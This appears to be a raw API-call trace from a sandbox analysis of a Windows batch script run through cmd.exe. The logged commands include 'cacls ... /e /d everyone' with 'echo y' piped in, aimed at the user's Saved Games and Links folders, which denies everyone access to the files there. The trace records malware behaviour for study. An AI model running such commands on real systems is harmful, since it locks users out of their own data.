[0035.572] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.572] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.572] SetErrorMode (uMode=0x0) returned 0x0 [0035.572] SetErrorMode (uMode=0x1) returned 0x0 [0035.572] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0035.572] SetErrorMode (uMode=0x0) returned 0x1 [0035.572] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.572] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.572] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.572] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.572] GetLastError () returned 0x2 [0035.572] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.572] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18548 [0035.573] FindClose (in: hFindFile=0xd18548 | out: hFindFile=0xd18548) returned 1 [0035.573] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.573] GetLastError () returned 0x2 [0035.573] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18548 [0035.573] FindClose (in: hFindFile=0xd18548 | out: hFindFile=0xd18548) returned 1 [0035.573] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.573] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.573] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.573] SetErrorMode (uMode=0x0) returned 0x0 [0035.573] SetErrorMode (uMode=0x1) returned 0x0 [0035.573] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0035.573] SetErrorMode (uMode=0x0) returned 0x1 [0035.573] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.573] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.573] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.573] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.573] GetLastError () returned 0x2 [0035.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bf00 [0035.574] FindClose (in: hFindFile=0xd1bf00 | out: hFindFile=0xd1bf00) returned 1 [0035.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.574] GetLastError () returned 0x2 [0035.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bf00 [0035.574] FindClose (in: hFindFile=0xd1bf00 | out: hFindFile=0xd1bf00) returned 1 [0035.574] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.574] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.574] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.587] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.587] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.588] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.588] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.588] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.588] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0xb50, dwThreadId=0xb54)) returned 1 [0035.591] CloseHandle (hObject=0x80) returned 1 [0035.591] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.591] GetEnvironmentStringsW () returned 0xd1b020* [0035.591] FreeEnvironmentStringsA (penv="=") returned 1 [0035.591] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.591] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0035.591] _close (_FileHandle=4) returned 0 [0035.591] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0035.645] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.645] CloseHandle (hObject=0x94) returned 1 [0035.645] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0035.649] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.649] CloseHandle (hObject=0x8c) returned 1 [0035.649] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.649] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.654] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.654] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.654] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.654] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.654] SetConsoleInputExeNameW () returned 0x1 [0035.654] GetConsoleOutputCP () returned 0x1b5 [0035.655] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.655] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.655] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c [0035.655] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0035.655] _get_osfhandle (_FileHandle=3) returned 0x8c [0035.655] SetFilePointer (in: hFile=0x8c, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0035.655] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0035.655] ReadFile (in: hFile=0x8c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x78e, lpOverlapped=0x0) returned 1 [0035.655] SetFilePointer (in: hFile=0x8c, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0035.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n=%%i\r\n") returned 61 [0035.655] GetFileType (hFile=0x8c) returned 0x1 [0035.655] _get_osfhandle (_FileHandle=3) returned 0x8c [0035.655] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0035.656] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.656] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.656] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.656] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.656] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.656] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.656] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.656] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.656] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0035.656] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0035.656] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0035.656] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0035.656] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0035.656] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0035.656] _tell (_FileHandle=3) returned 797 [0035.656] _close (_FileHandle=3) returned 0 [0035.656] _pipe (in: _PtHandles=0xd26080, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd26080) returned 0 [0035.657] _dup (_FileHandle=1) returned 5 [0035.657] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0035.657] _close (_FileHandle=4) returned 0 [0035.657] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.657] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.657] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.657] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.657] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.657] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.657] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.657] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.657] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.657] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.657] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.657] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.657] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.657] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.657] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.657] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.657] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.657] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.657] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.657] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.657] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.657] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0035.657] SetErrorMode (uMode=0x0) returned 0x0 [0035.657] SetErrorMode (uMode=0x1) returned 0x0 [0035.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18268, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0035.657] SetErrorMode (uMode=0x0) returned 0x1 [0035.657] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0035.657] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.657] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.657] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd183a8 [0035.658] FindClose (in: hFindFile=0xd183a8 | out: hFindFile=0xd183a8) returned 1 [0035.658] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0035.658] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0035.658] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.658] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.658] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.658] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.658] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.659] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.659] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.659] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0xb58, dwThreadId=0xb5c)) returned 1 [0035.663] CloseHandle (hObject=0x94) returned 1 [0035.663] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.663] GetEnvironmentStringsW () returned 0xd15f98* [0035.663] FreeEnvironmentStringsA (penv="=") returned 1 [0035.663] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.663] _get_osfhandle (_FileHandle=3) returned 0x8c [0035.663] DuplicateHandle (in: hSourceProcessHandle=0x80, hSourceHandle=0x8c, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0035.663] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0035.663] _close (_FileHandle=5) returned 0 [0035.663] _dup (_FileHandle=0) returned 4 [0035.663] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0035.663] _close (_FileHandle=3) returned 0 [0035.663] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.663] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.663] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.663] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.663] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.663] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.663] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.663] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.663] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.663] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.663] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.663] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.663] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.663] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.663] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.663] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.663] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.663] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.663] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.663] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.663] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 